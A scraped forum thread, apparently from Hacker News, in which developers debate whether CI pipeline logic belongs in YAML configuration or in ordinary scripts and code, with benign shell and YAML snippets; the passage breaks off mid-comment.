Net result is that YAML was chosen not because it is good, but because it is universally terrible in the same way for everyone, and people begrudgingly settled on it.
With CI there is an extra twist that a good CI setup functions as a DAG - some tasks can - and should - run in parallel for optimization. These tasks produce artifacts which can be cached and reused, and a well-set CI pipeline should be able to make use of that.
Consequently, I think a possible escape path - albeit an expensive one - would be for a "next gen" CI system to expose those _task primitives_ via an API that is easy to write SDKs for. Read: not a grpc API. From there, YAML could be ditched as "actual code" would manipulate the CI primitives during build.
mdaniel 7 days ago [-]
> (I always wondered who started it with YAML and why everyone copied that, if anyone knows I'd love to read about it).
I know this isn't a definite answer to your question, but it was still super interesting to me and hopefully it will inspire someone else to dig into finding the actual answer
- I was shocked that GitHub existed in 2008 https://web.archive.org/web/20081230235955/http://github.com... with an especial nod to "no longer a pain in the ass" and "Not only is Git the new hotness, it's a fast, efficient, distributed version control system ideal for the collaborative development of software", but this was just a "for funsies" link since they were very, very late to the CI/CD game
- cloud-init had yaml in 2010 https://github.com/openstack-archive/cloud-init/blob/0.7.0/d... so that's a plausible "it started here" since they were yaml declarations of steps to perform upon machine boot (and still, unquestionably, my favorite user-init thing)
> Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines.
I've been using YAML for ages and I never had any issue with it. What do you think is wrong with YAML?
mst 7 days ago [-]
Turing complete YAML ends up being an app specific terrible programming language.
Many of us would rather use a less terrible programming language instead.
hadlock 7 days ago [-]
Something went horribly wrong if your coworkers are putting switching logic inside your config
motorest 7 days ago [-]
[flagged]
hadlock 7 days ago [-]
I've been using YAML professionally for a decade and, other than forgetting to wrap some values in quotes, it has been an absolute non-issue.
Some people talk about YAML being used as a Turing-complete language; if people try to do that in your CI/CD system, just fire them.
I'll allow helm style templating but that's about it.
mschuster91 7 days ago [-]
> Some people here still can’t believe YAML is used for not only configuration, but complex code like optimized CI pipelines. This is insane.
It's miles better than Jenkins and the horrors people created there. GitLab CI can at least be easily migrated to any other GitLab instance and stuff should Just Work because it is in the end not much more than self contained bash scripts, but Jenkins... is a clown show, especially for Ops people of larger instances. On one side, you got 50 plugins with CVEs but you can't update them because you need to find a slot that works for all development teams to have a week or two to fix their pipelines again, and on the other side you got a Jenkins instance for each project which lessens the coordination effort but you gotta worry about dozens of Jenkins instances. Oh and that doesn't include the fact many old pipelines aren't written in Groovy or, in fact, in any code at all but only in Jenkins's UI...
Github Actions however, I'd say for someone coming from GitLab, is even worse to work with than Jenkins.
robinwassen 7 days ago [-]
Did a similar thing when we needed to do complex operations towards aws.
Instead of wrapping the aws cli command I wrote small Go applications using the AWS SDK for Go.
Removed the headaches when passing in complex params and parsing output, and also made the logic portable, as we need to do the builds on different platforms (Windows, Linux and macOS).
noworriesnate 7 days ago [-]
I've used nuke.build for this in the past. This makes it nice for injecting environment variables into properties and for auto-generating CI YAML to wrap the main commands, but it is a bit of a pain when it comes to scaling the build. E.g. we did infrastructure as code using Pulumi, and that caused the build code to dramatically increase to the point the Nuke script became unwieldy. I wish we had gone the plain C# CLI app from the beginning.
ozim 7 days ago [-]
I don’t think it is insanity, quite the opposite: insanity is trying to force everything into yaml or the pipeline.
I have seen people doing absolutely insane setups because they thought they had to do it in yaml and the pipeline, that there was absolutely no other option, or that it was somehow wrong to drop some stuff into code.
motorest 7 days ago [-]
> I don’t think it is insanity quite the opposite - insanity is trying to force everything in yaml or pipeline.
I'm not sure I understood what you're saying because it sounds too absurd to be real. The whole point of a CICD pipeline is that it automates all aspects of your CICD needs. All mainstream CICD systems support this as their happy path. You specify build stages and build jobs, you manage your build artifacts, you setup how things are tested, deployed and/or delivered.
That's their happy path.
And you're calling the most basic use cases of a standard class of tools "insanity"?
Please help me understand what point you are trying to make.
ozim 7 days ago [-]
In the article Strange Way to Enforce Status Checks with Merge Queue.
All aspects of your CICD pipeline - rebasing PRs is not a 'basic CICD' need.
CICD pipeline should take a commit state and produce artifacts from that state, not lint and not autofix trivial issues.
Everything that is not "take code state - run tests - build - deploy (eventually fail)" is insanity.
Autofixing/linting for example should be separate process waay before CICD starts. And people do stuff like that because they think it is part of integration and testing. Trying to shove it inside is insanity.
mst 7 days ago [-]
Honestly, "using the same language as the application" is often a solid choice no matter what the application is written in. (and I suspect that for any given language somebody might propose as an exception to that rule, there's more than one team out there doing it anyway and finding it works better for them than everything else they've tried)
7bit 7 days ago [-]
> The other thing I would add is consider passing in all environment variables as args. This makes it easy to see what dependencies the script actually needs, and has the bonus of being even more portable.
This is the dumbest thing I see installers do a lot lately.
no_wizard 7 days ago [-]
Am I an outlier in that not only do I find GitHub actions pleasant to use, but that most folks over complicate their CI/CD pipelines?
I've had to re-write a lot of actions configurations over the last few years, and in every case, the issue was simply not thinking through the limits of the platform, or when things would be better run as custom docker images (which you can do via GitHub Actions) etc.
It tends to be that folks want to shoehorn some technology into the pipeline that doesn't really fit, or they make these giant one shot configurations instead of running multiple small parallel jobs by setting up different configurations for different concerns etc.
davidham 7 days ago [-]
I'm with you! I kind of love GitHub Actions, and as long as I keep it to tools and actions I understand, I think it works great. It's super flexible and has many event hooks. It's reasonably easy to get it to do the things I want. And my current company has a pretty robust CI suite that catches most problems before they get merged in. It's my favorite of the CI platforms I have used.
gchamonlive 7 days ago [-]
The way gitlab structures pipelines is just fundamentally better than GitHub Actions.
This way I can code my pipeline and use the same infrastructure to isolate groups of jobs that compose a relevant piece of functionality and test it in isolation from the rest of the pipeline.
I just wish components didn't have such a rigid opinion on folder structure, because they are really powerful, but you have to adopt GitLab's prescription
rbongers 7 days ago [-]
In my opinion, unless you need its ability to figure out when something should rebuild (or you already use it), Make is not the right tool for the job. You should capture your pipeline jobs in scripts or similar; Make just adds another language for developers to learn on top of everything. Make is not a simple script runner.
I maintained a Javascript project that used Make and it just turned into a mess. We simply changed all of our `make some-job` jobs into `./scripts/some-job.sh` and not only was the code much nicer, less experienced developers were suddenly more comfortable making changes to scripts. We didn't really need Make to figure out when to rebuild anything, all of our tools already had caching.
JanMa 7 days ago [-]
Make is definitely just my personal preference. If using bash scripts, Just, Taskfile or something similar works better for you then by all means use it.
The main argument I wanted to make is that it works very well to just use GitHub actions to execute your tool of choice.
DanHulton 7 days ago [-]
This is why I've become a huge fan of Just, which is just a command runner, not a build caching system or anything.
It allows you to define a central interface into your project (largely what I find people justify using Make for), but smooths out so many of the weird little bumps you run into from "using Make wrong."
Plus, you can at any point just drop into running a script in a different language as your command, so it basically "supports bash scripts" too.
This. I don't know which guru came up with it, but this is the 'one-click build' principle. If you can't do that, you have a problem.
So if even remotely possible we write all CI as a single 'one-click' script which can do it all by itself. Makes developing/testing the whole CI easy. Makes changing between CI implementations easy. Can solve really nasty issues (think: CI is down, need to send update to customer) easily because if you want a release you just build it locally.
The only thing it won't automatically do out of the box is be fast, because obviously this script also needs to set up most of the build environment. So depending on the exact implementation there's variation in the split between what constitutes setting up a build environment and running the CI script. As in: for some tools our CI scripts will do 'everything', starting from a minimal OS install. Whereas others expect an OS with build tools and possibly some dependencies already available.
xyzal 7 days ago [-]
I think it was mentioned as a part of the 'Joel test'
Yeah spot on, this was definitely it. I now remember reading this probably right after it came out and being somewhat proud to be able to tick most stuff off the list without ever being told directly to do so. But 'Can you make a build in one step?' was not one of them, so I figured that since the rest of the list made so much sense, I'd better get started on that one as well.
I also really like that most of this list is practical, low-level advice. No 'use tech X' or 'agile ftw', just basic stuff which automatically happens anyway if you'd opt to use tech X or agile - should those be the right tools for the job, but which would cause more friction if not.
tailspin2019 7 days ago [-]
25 years later and we’re still having to relearn some of his lessons!
cruffle_duffle 7 days ago [-]
At least we generally aren’t fighting “use source control”. Maybe the VCS used by the shop is dogshit but it’s better than nothing!
makeitdouble 7 days ago [-]
> * Invest time that your pipelines can run locally on a developer machine as well (as much as possible at least), otherwise testing/debugging pipelines becomes a nightmare.
Yes, a thousand time.
Deploy scripts are tougher to deal with, as they'll naturally rely on a flurry of environment variables, protected credentials etc.
But for everything else, writing the script for local execution first, and generalizing it for CI once it runs well enough, is the absolute best approach. It doesn't even need to run in the local shell; having all the CI stuff in a dedicated docker image is fine if it requires specific libraries or env.
20thr 7 days ago [-]
I spend a lot of time in CI (building https://namespace.so) and I agree with most of this:
- Treat pipelines as code.
- Make pipelines parts composable, as code.
- Be mindful of vendor lock-in and/or lack of portability (it is a trade-off).
For on-premise: if you're already deeply invested in running your own infrastructure, that seems like a good fit.
When thinking about how we build Namespace -- there are parts that are so important that we just build and run internally; and there are others where we find that the products in the market just bring a tremendous amount of value beyond self-hosting (Honeycomb is a prime example).
Use the tools that work best for you.
LukaD 7 days ago [-]
> [...] use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code
I fully agree with the recommendation to use maintainable code. But that effectively rules out shell scripts in my opinion. CI shell scripts tend to become a big ball of mud rather quickly as you run into the limitations of bash. I think most devs only have superficial knowledge of shell scripting, so do yourself a favor and skip it and go straight to whatever language your team is comfortable with.
sgarland 7 days ago [-]
Maybe people should get better at shell, instead. Read the bash / zsh manual. Use ShellCheck.
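For example, here is the classic unquoted-expansion footgun that ShellCheck flags as SC2086, as a small self-contained demo (the filename is made up):

```shell
#!/usr/bin/env sh
# Word splitting: an unquoted variable expansion turns one filename
# containing a space into two separate arguments.
cd "$(mktemp -d)"
f="my file.txt"
touch "$f"

# 'ls $f' becomes 'ls my file.txt' (two args, neither exists) and fails.
ls $f  >/dev/null 2>&1 || echo "unquoted: not found"
# Quoting keeps the filename intact.
ls "$f" >/dev/null 2>&1 && echo "quoted: found"
```

Running ShellCheck over this prints a warning on the unquoted line and nothing on the quoted one, which is exactly the kind of mistake that otherwise only surfaces in a failed pipeline.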
int_19h 6 days ago [-]
Shell is just a horrible PL, period. Not only is it weird and unlike anything else out there, there are way too many footguns.
One can learn to use it to the point where it's usable to do advanced automation... but why, when there are so many better options available?
sgarland 6 days ago [-]
Because it’s never going away, and it’s always going to be there. It is the lowest common denominator. Also, a shell script generally doesn’t have any other dependencies (modulo writing one that calls jq or something). No risk of solver hell.
cnotv 7 days ago [-]
Once, a reliable and wise colleague told me "Use in CI what you use locally", and that has been the best devops advice that never failed to save me time.
The second one, from someone else: if you can use anything other than bash, do that.
amtamt 7 days ago [-]
Try brainfuck...
Jokes aside... it's so trendy to bash bash that it's not funny anymore.
Bash is still quite reliable for work that usually gets done in CI, and nearly maintenance free if used well.
badmintonbaseba 6 days ago [-]
I prefer python there, although we do test/deploy on Windows too, so it's nice to have a common python script for Windows and Linux CI. Not interested in making bash work on Windows or scripting in powershell. And although it's a lot more awkward to use python than bash for invoking subprocesses, it's nicer in most other ways.
balls187 7 days ago [-]
These days, AI copilots are quite good at helping write and maintain bash (and shell) scripts, so it's not much of a problem.
psyclobe 7 days ago [-]
'* Write as much CI logic as possible in your own code. Does not really matter what you use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code.'
THIS, 10000%.
jpgvm 7 days ago [-]
This is the way.
My personal favourite solution is Bazel specifically because it can be so isolated from those layers.
No need for Docker (or Docker in Docker as many of these solutions end up requiring) or other exotic stuff, can produce OCI image artifacts with `rules_oci` directly.
By requiring so little of the runner you really don't care for runner features, you can then restrict your CI/CD runner selection to just reliability, cost, performance and ease of integration.
otikik 7 days ago [-]
> * Avoid YAML as much as possible, period.
That's also a very valid takeaway for life in general
gabyx 3 days ago [-]
Ohh, @deng, my exact words and you are 100% right. Same experience, same conclusion:
- I would go even further: do not use bash/python or any duck-typed lang. (only for simple projects, but better just don't get started).
- Leverage Nix (!! no, it's not a joke ecosystem): devshells or/and build devcontainers out of it.
- Treat tooling code and CI code the exact same as your other code.
- Maybe generate the pipeline for your YAML-based CI system in code.
- If you use a CI system (gitlab, circle, etc.), use one which does not do stupid things with your containers (like GitHub's 4-year-old f** up: https://github.com/actions/runner/issues/863#issuecomment-25...). Also one which lets you run dynamically generated pipelines.
That's why we built our own build tool which does that, or at least helps us do the above things:
I always thought it could be cool to use systemd as a CI agent replacement someday:
Each systemd service could represent a step built by running a script, and each service can say what it depends on, thus helping parallelize any step that can be.
I have not found anyone trying that so far. Is anybody aware of something similar and more POSIX/cross platform that allows writing a DAG of scripts to execute?
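Not systemd, but the DAG idea can be sketched in plain shell, with background jobs as parallel steps and wait as the dependency edge (a toy illustration, not a real runner; the step names are invented):

```shell
#!/usr/bin/env sh
# Sketch of a DAG of CI steps: 'lint' and 'build' have no dependencies
# and run in parallel; 'integration' depends on both and must wait.
set -eu

lint()        { echo "lint done"; }
build()       { echo "build done"; }
integration() { echo "integration done"; }

lint  & lint_pid=$!
build & build_pid=$!

# Dependency edge: integration may not start before lint and build finish.
wait "$lint_pid" "$build_pid"
integration
```

A real implementation would need per-step logging, failure propagation, and artifact caching, which is roughly the feature list systemd units would provide for free.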
ozim 7 days ago [-]
Good insight, because that is just a complex issue - especially when there is team churn and everyone adds their parts in yaml or configuration.
Doesn’t matter Jenkins or actions - it is just complicated. Making it simpler is on devs/ops not the tool.
forrestthewoods 7 days ago [-]
> pipelines can run locally on a developer machine as well (as much as possible at least)
Facts.
However I’ll go a step further and say “only implement your logic in a tool that has a debugger”.
YAML is the worst. But shell scripts are the second worst. Use a real language.
never_inline 7 days ago [-]
Python with click and PyYAML can go a long way - then you can build it as a CLI application and use the same from CI. In a Java shop, picocli + graalvm probably. I wouldn't like Go for this purpose (against the conventional wisdom, because of boilerplate and pretty bad debugging capabilities).
That said, if you absolutely need to use shell scripts for reasons, keep it all in a single script, define logging functions including debug logs, rigorously check every constraint and variable, use shellcheck, and factor the code well into functions - I should write a blog post about it sometime.
folmar 7 days ago [-]
There is a debugger for bash: https://github.com/Trepan-Debuggers/bashdb
Not that I'm recommending 10k-line programs in bash, but a debugger is useful when you need it.
sgarland 7 days ago [-]
Shell is a very real language, and it has a debugger; it’s called set -x and/or strace.
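For illustration, set -x traces every command to stderr before it runs, which is often all the 'debugger' a CI script needs:

```shell
#!/usr/bin/env sh
# With set -x, the shell prints each command (prefixed with '+') to
# stderr before executing it: a built-in execution log.
set -x
name="world"
echo "hello $name"
set +x
```

In a CI log, the '+'-prefixed trace lines show exactly which command was running when a step failed, with all variables already expanded.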
forrestthewoods 6 days ago [-]
Like I said, use something with a real debugger.
julienEar 7 days ago [-]
Completely agree. Keeping CI logic in actual code instead of YAML is a lifesaver. The GitHub Actions security issues just reinforce why self-hosted runners are the way to go.
crabbone 7 days ago [-]
First of all, I cannot agree more, given what we have today.
Unfortunately, this isn't a good plan going forward... :( Going forward, I'd wish for a tool that's as ubiquitous as Git, has good integration with editors like language servers, and can be sold as a service or run completely in-house. And it would allow defining the actions of the automated builds and tests, have a way of dealing with releases, expose an interface for collecting statistics, integrate with bug tracking software for the purpose of excluding/including tests in test runs, and allow organizing tests in groups (e.g. sanity / nightly / rc).
The problem is that tools today don't come anywhere close to being what I want for CI; neither free nor commercial tools are even going in the desired direction. So the best option is simply to minimize their use.
iloveitaly 7 days ago [-]
I very much agree here. I've had the best luck when there is as little config in CI as possible:
- mise for lang config
- direnv for environment loading
- op for secret injection
- justfile for lint, build, etc
Here's a template repo that I've been working on that has all of this implemented:
Why does YAML have any traction when JSON is right there? I'm an idiot amateur and even I learned this lesson; my 1 MB YAML file full of data took 15 seconds to parse each time. I quickly learned to use JSON instead, takes half a second.
12_throw_away 7 days ago [-]
> Why does YAML have any traction when JSON is right there?
Because it has comments, which are utterly essential for anything used as a human readable/writable configuration file format (your use case, with 1 MB of data, needs a data interchange format, for which yes JSON is at least much better than YAML).
fireflash38 6 days ago [-]
JSON is valid YAML.
YAML has comments.
YAML is easily & trivially written by humans.
JSON is easily & trivially written by code.
My lesson learned here? When you need to generate YAML, generate JSON instead. If it's meant to be read and updated by humans, use something that can communicate to the humans (comments). And don't use YAML as a data interchange format.
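That rule of thumb in miniature (the job shape here is made up; since JSON is a subset of YAML 1.2, any YAML consumer will accept the output):

```shell
#!/usr/bin/env sh
# Generate pipeline config as JSON rather than templating YAML text:
# no indentation rules, no quoting ambiguity, trivial to emit from code.
set -eu

job_name="build"
printf '{"job": "%s", "script": ["make build"]}\n' "$job_name"
```

A real generator would of course use a proper JSON library in whatever language the tooling is written in; the point is only that the machine-written side never has to produce YAML.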
sofixa 7 days ago [-]
Because YAML, as much as it sucks, is relatively straightforward to write by humans. It sucks to read and parse, you can make tons of small mistakes that screw it up entirely, but it's still less cruft than tons of needless "": { } .
For short configs, YAML is acceptable-ish. For anything longer I'd take TOML or something else.
qweiopqweiop 7 days ago [-]
Can you explain YAML? I've found declarative pipelines with it have been... fine?
deng 7 days ago [-]
YAML is fine for what it is: a markup language. I have no problem with it being used in simple configuration files, for instance.
However, CI is not "configured", it is coded. It is simply the wrong tool. YAML was continuously extended to deal with that, so it developed into much more than just "markup", but it grew into this terrible chimera. Once you start using advanced features in GitLab's YAML like anchors and references to avoid writing the same stuff again and again, you'll notice that the whole tooling around YAML is simply not there. How does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended to.
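For anyone who hasn't run into it, the anchor/merge-key pattern being warned against looks roughly like this (job names and commands are illustrative). It's terse, but there's no standard tooling to preview the expanded result or step through it:

```yaml
.defaults: &defaults
  image: alpine:3.19
  before_script:
    - apk add --no-cache make

build:
  <<: *defaults        # merge key: copies everything from .defaults
  script:
    - make build

test:
  <<: *defaults
  script:
    - make test
```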
LeonM 7 days ago [-]
> CI is not "configured", it is coded.
Finally! I was always struggling to explain to others why YAML is OK-ish as a language, but then never seems to work well for the things people tried doing with it. Especially stuff that needs to run commands, such as CI.
> What does the resulting YAML look like? How do you run this stuff locally? How do you debug this? Just don't go there.
Agreed. GitHub actions, or any remote CI runner for that matter, makes the problem even worse. The whole cycle of having to push CI code, wait 10 minutes while praying for it to work, still getting an error, trying to figure out the mistake, fixing one subtle syntax error, then pushing the code again in the hope that that works is just a terrible workflow. Massive waste of time.
> You will not be able to avoid YAML completely, obviously, but use it the way it was originally intended.
Even for configurations YAML remains a pain, unfortunately. It could have been great for configs, but in my experience the whole strict whitespace (tabs-vs-spaces) part ruined it. It isn't a problem when you work from an IDE that protects you from accidentally using tabs (also, auto-formatting for the win!) but when you have to write YAML configuration (for example: Netplan) on a remote server using just an editor it quickly becomes a game of whack-a-mole.
motorest 7 days ago [-]
> Especially stuff that needs to run commands, such as CI.
I don't understand what problem you could possibly be experiencing. What exactly do you find hard about running commands in, say, GitLab CICD?
cmsj 7 days ago [-]
So, I'm not interested in the debate about the correctness (or otherwise) of yaml as a declarative programming language, but I will say this...
iterating a GitHub Actions workflow is a gigantic pain in the ass. Capturing all of the important logic in a script/makefile/whatever means I can iterate it locally way faster and then all I need github to do is provision an environment and call my scripts in the order I require.
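A minimal sketch of that split, assuming a hypothetical ci/build.sh; the workflow YAML then shrinks to "check out, then run this":

```shell
#!/bin/sh
# ci/build.sh (hypothetical): all real CI logic lives here, so the exact
# same steps run on a laptop and in the hosted runner.
set -eu

step() { printf '==> %s\n' "$*"; }

main() {
  step "lint"     # linters would be invoked here
  step "build"    # compiler / bundler invocation goes here
  step "test"     # test runner goes here
  step "done"
}

main "$@"
```

The workflow file then only needs a single `run: ./ci/build.sh` step, and iteration happens locally.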
motorest 7 days ago [-]
> iterating a GitHub Actions workflow is a gigantic pain in the ass. Capturing all of the important logic in a script/makefile/whatever means I can iterate it locally way faster and then all I need github to do is provision an environment and call my scripts in the order I require.
When it gets realistic, with conditions, variable substitutions, etc., it ends up being 20 steps in a language that isn't shell but is calling shell over and over again, and can't be run outside of CI. Whereas, if you just wrote one shell script, it could've done all of those things in one language and been runnable locally too.
motorest 6 days ago [-]
> When it gets realistic, with conditions, variable substitutions, etc.,
What exactly do you find hard in writing your own scripts with a scripting language? Surely you are not a software developer who feels conditionals and variable substitutions are hard.
> it ends up being 20 steps in a language that isn't shell but is calling shell over and over again, and can't be run outside of CI.
Why are you writing your CICD scripts in a way that you cannot run them outside of a CICD pipeline? I mean, you're writing them yourself, aren't you? Why are you failing to meet your own requirements?
If you have a requirement to run your own scripts outside of a pipeline, how come you're not writing them like that? It's CICD 101 that those scripts should be runnable outside of the pipeline. From your description, you're failing to even follow the most basic recommendations and best practices. Why?
That doesn't sound like a YAML problem, does it?
kbolino 6 days ago [-]
This is not about YAML in some general or abstract sense, it is about a YAML-based domain-specific language. If you think this is just about YAML, you are hyper-focused on the wrong detail.
In order to use this domain-specific language properly, you first must learn it, and learning YAML is but a small part of that. Moreover, it is not immediately obvious that, once you know it, you actually want to avoid it. But you can't avoid it entirely, because it is the core language of the CI/CD platform. And you can't know how to avoid it effectively until you have spent some time just using it directly. Simplicity comes from tearing away what is unnecessary, but to discern necessary from unnecessary requires judgment gained by experience. There is no world in which this knowledge transfers immediately, frictionlessly, and losslessly.
Furthermore, there is a lot that GitHub (replace with platform of choice) could have done to make this better. They largely have no incentive to do so, because platform lock-in isn't a bad thing to the platform owner, and it's a nontrivial amount of work on their part, just as it is a nontrivial amount of work on your part to learn and use their platform in a way that doesn't lock you into it.
maratc 7 days ago [-]
Q: How do you determine what date it was 180 days ago?
A: Easy! You just spin up a Kubernetes pod with Alpine image, map a couple of files inside, run a bash script of "date" with some parameters, redirect output to a mapped file, and then read the resulting file. That's all. Here's a YAML for you. Configuration, baby!
(based on actual events)
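For contrast, the entire task outside the cluster is one line of shell (GNU coreutils date, as found in most CI images; BSD/macOS spells it `date -v-180d`):

```shell
# What date was it 180 days ago? No pod, no volume mounts, no YAML.
date --date='180 days ago' +%Y-%m-%d
```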
jiggawatts 6 days ago [-]
At first I assumed you were kidding, then I realised that sadly… you probably weren’t.
maratc 6 days ago [-]
I wasn’t. This goes to show that when all you have is a YAML hammer, every problem has to look like a YAML-able nail. Still there would be people who would say I’m “blaming my tools” and “everything is covered in chapter 1 of yaml for dummies.”
tom_ 7 days ago [-]
Nothing significant on the face of it and I think that's pretty much exactly what's being suggested: don't have anything particularly interesting in the .yml file, just the bare minimum plus some small number of uncomplicated script invocations to install dependencies and actually do the build.
(Iterating even on this stuff by waiting for the runner is still annoying though. You need to commit to the repo, push, and wait. Hence the suggestion of having scripts that you can also run locally, so you can test changes locally when you're iterating on them. This isn't any kind of guarantee, but it's far less annoying to do (say) 15 iterations locally followed by the inevitable extra 3 remotely than it is having to do all 18 remotely, waiting for the runner each time then debugging it by staring at the output logs. Even assuming you'd be able to get away with as few as 15 given that you don't have proper access to the machine.)
bastardoperator 7 days ago [-]
But GitHub recommends that, so if people don't follow best practices, and then complain when the docs are clear, who's at fault? The person writing against a system they don't understand because they haven't read the docs or the people who recommend what you're professing in the docs?
Nothing in that document states anything remotely like the antecedent of "that", which was:
> don't have anything particularly interesting in the .yml file, just the bare minimum plus some small number of uncomplicated script invocations to install dependencies and actually do the build
It is a very basic "how to" with no recommendations.
Moreover, they directly illustrate a bad practice:
- name: Run the scripts
  run: |
    ./my-script.sh
    ./my-other-script.sh
This is not running two scripts, this is running a shell command that invokes two scripts, and has no error handling if the first one fails. If that's the behavior you want, fine, but then put it in one shell script, not two. What am I supposed to do with this locally? If the first shell script fails, do I need to fix it, or do I just proceed on to the second one?
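The underlying shell semantics are easy to check locally, independent of how any particular runner configures its shell; this sketch shows both behaviors:

```shell
#!/bin/sh
# Without `set -e`, a command list keeps going after a failure; with it,
# the shell stops at the first failing command.
without_e() { sh -c 'false; echo second-ran'; }
with_e()    { sh -c 'set -e; false; echo second-ran'; }

without_e                                    # prints: second-ran
with_e || echo "stopped after first failure"
```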
bastardoperator 6 days ago [-]
It does even if you don't like it. You can put your logic in a script and execute that. That is what is being conveyed here in a blisteringly simple fashion. You could also make it one script, or two or three, you could even break those out into steps.
This is invoking a shell and that's how shells typically work, one command at a time. Would it make you feel better if they added && or used a step like they also recommend to split these out? You can put the error handling in your script if need be, that's on you or the reader, most CI agents only understand true/false or in this case $?.
Nobody said they want that behavior, they're showing you the behavior. They actually show you the best practice behavior first, not sure if you didn't read that or are purposely omitting it. In fact, the portion you highlight, is talking about permissions, not making suggestions.
- name: Run a script
  run: ./my-script.sh
- name: Run another script
  run: ./my-other-script.sh
kbolino 6 days ago [-]
This is not a discussion about what's possible, it's a discussion about what's best. You can write your own opinion here, and it seems like we're in violent agreement, but that doesn't make our opinion GitHub's opinion.
That page is just one small part of a much larger reference document, and it doesn't seem opinionated at all to me. Plus there are dozens of other examples elsewhere in the same reference that are not simple invocations of one shell script and nowhere are you admonished not to do things that way.
bastardoperator 6 days ago [-]
And they show those patterns first. You had to take an example that is clearly about script permissions and misrepresent it. Yeah, it's not opinionated, it's fact. That's how it works...
kbolino 6 days ago [-]
At best, we are talking past each other. At worst, you are misreading everything I write to play gotcha games. Whatever, I'm glad you were able to figure out exactly the right things to do from a first read of a large and complex document that doesn't say anything of the sort. As for the rest of us mere mortals, we're stuck figuring these things out by trial and error, or even worse, having to pick up the pieces from somebody else's left-behind mistakes.
tom_ 6 days ago [-]
It's the reference manual. It's just a list of things you can do. If you like this specific thing, and think this should be the main way you express your build process, great. I think that too. Meanwhile with GitHub Actions you can also do this big pile of shit that the manual also describes: https://docs.github.com/en/actions/writing-workflows/choosin...
motorest 7 days ago [-]
> However, CI is not "configured", it is coded.
No, it really isn't. I'll clarify why.
Pretty much all pipeline services share the same architecture pattern:
* A pipeline run is comprised of one or more build jobs,
* Pipeline runs are triggered by external events
* Build jobs have contexts and can output artifacts,
* Build jobs are grouped into stages,
* Stages are organized as a directed graph,
* Transitions between stages in the directed graph are governed by a set of rules, some supported by default (i.e., if a job fails then the stage fails), complemented by custom rules (manual or automatic approvals, API tests, baking periods, etc.).
This is the textbook scenario ideal for DSLs. You are already bound to an architecture pattern, thus there is no point in reinventing the wheel each time. Just specify your stages and which jobs run as part of each stage, manage artifacts and promotion logic, and you're done.
You do not need to take my word for it. Take a look at GitLab CICD for a pipeline with build, test, and delivery stages. See what a mess you will end up with if you try to support the same feature set with whatever scripting language you choose. There is no discussion or debate.
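To be fair to this position, the three-stage case really is compact in the DSL; a sketch (script paths invented):

```yaml
stages: [build, test, deliver]

build:
  stage: build
  script: ./ci/build.sh
  artifacts:
    paths: [dist/]

test:
  stage: test
  script: ./ci/test.sh

deliver:
  stage: deliver
  script: ./ci/deliver.sh
  when: manual        # promotion gate: a human approves delivery
```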
baq 7 days ago [-]
I can’t understand how you can say DSL and YAML in the same sentence and say it’s fine. YAML is a serialization format. A bad DSL would be a welcome improvement over GHA pipelines in YAML. You’re fundamentally confusing concepts here, you want to restrict flexibility (I agree with that btw) by using a simplistic language, but what it actually does is increase complexity of the code comprising the pipeline with zero hard restrictions.
motorest 7 days ago [-]
[flagged]
maratc 7 days ago [-]
> * Stages are organized as a directed graph
The problem starts when that graph cannot be determined in advance and needs to be computed at runtime. It's a bit better when it's possible to compute that graph as a first step, and a lot worse when one needs to run a couple of stages before being able to compute the next elements of the graph. The graph computation is terrible enough in e.g. Groovy, but having to do it in YAML is absolutely horrendous.
> Take a look at GitLab CICD for a pipeline with build, test, and delivery stage
Yeah, if your workflow fits in a kindergarten example of "build, test, and delivery", then yeah, it's YAML all the way baby. Not everyone is so fortunate.
duped 7 days ago [-]
It's funny how you say this is the textbook scenario ideal for DSLs and I see it as the textbook scenario ideal for a real programming language. Organizing stages as a DAG with "transition ruled by a set of rules" is bonkers, I know how to write code with conditional logic and subroutine calls, give that to me.
Wrapping it in a DSL encoded as YAML has zero benefit other than it being easier for a team with weak design skills to implement and harder for users to migrate off of.
deng 7 days ago [-]
We don't disagree here. There are tools which support you in doing this, and I mentioned a few of them in my post (Make, Just, doit, mage). There are many more. I also think that re-inventing these tools is a waste of time, but it is still better than shoehorning this into YAML. You seem to think YAML is some kind of DSL for pipelines. It really is not.
Lammy 7 days ago [-]
> YAML is fine for what it is: a markup language.
Pardon my pedantry, but the meaning of YAML's name was changed from the original “Yet Another Markup Language” to “YAML Ain't Markup Language” in a 2002 draft spec because YAML is, in fact, not a markup language :)
> However, CI is not "configured", it is coded. . . . YAML was continuously extended to deal with that, so it developed into much more than just "markup", but it grew into this terrible chimera.
Brings to mind the classic "Kingdom of Nouns" [0] parable, which I read to my kid just last week. The multi-line "run" nodes in GitHub actions give me the heebie-jeebies, like how MUMPS data validation was maintained in metadata of VA-Fileman [1].
I've created multiple actions, reusable and composite, along with multiple Jenkins plugins and CircleCI Orbs. I disagree: code your actions, your Jenkins plugins, your orbs, whatever. Those are just code wrappers that expose configuration via YAML or Pipeline DSL. Agreed, coding in YAML is pretty bad, but ultimately it's a choice.
I will take the Actions path 100% of the time. Building your own action is so insanely simple it makes me wonder if the people complaining about YAML understand the tooling, because it's entirely avoidable. It also coincides with the top comments about coding your own CI; if you're just "using" YAML you're barely scratching the surface.
ruuda 7 days ago [-]
If you have to deal with tools that need to be configured with yaml, give https://rcl-lang.org/ a try! It can be "coded" to avoid duplication, with real variables, functions, and loops. It can show you the result that it evaluates to. It can do debug tracing, and it has a built-in build command to generate files like GitHub Actions workflows from an RCL file.
crabbone 7 days ago [-]
YAML's problems:
* Very easy to write the code you didn't mean to, especially in the context of CI where potentially a lot of languages are going to be mixed, a lot of quoting and escaping. YAML's string literals are a nightmare.
* YAML has no way to express inheritance. Nor does it have a good way to express variables. Both are usually desperately needed in CI scripts, and are usually bolted on top with some extra-language syntax (all those dollars in GitHub actions, Helm charts, Ansible playbooks etc.)
* Complexity skyrockets compared to the size of the file. I.e. in a language like C you can write a manageable program with millions of lines of code. In YAML you will give up after a few tens of thousands of lines (similar to SQL or any other language that doesn't have modules).
* Whitespace errors are very hard to spot and fix. Often whitespace errors in YAML result in valid YAML which, however, doesn't do what you want...
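An example of that last point (job keys invented): both documents below parse cleanly, but only the first means what was intended:

```yaml
# Intended: DEBUG is a job variable
job:
  variables:
    DEBUG: "1"
  script: [./run.sh]
---
# One indentation slip later: still valid YAML, but `variables` is now
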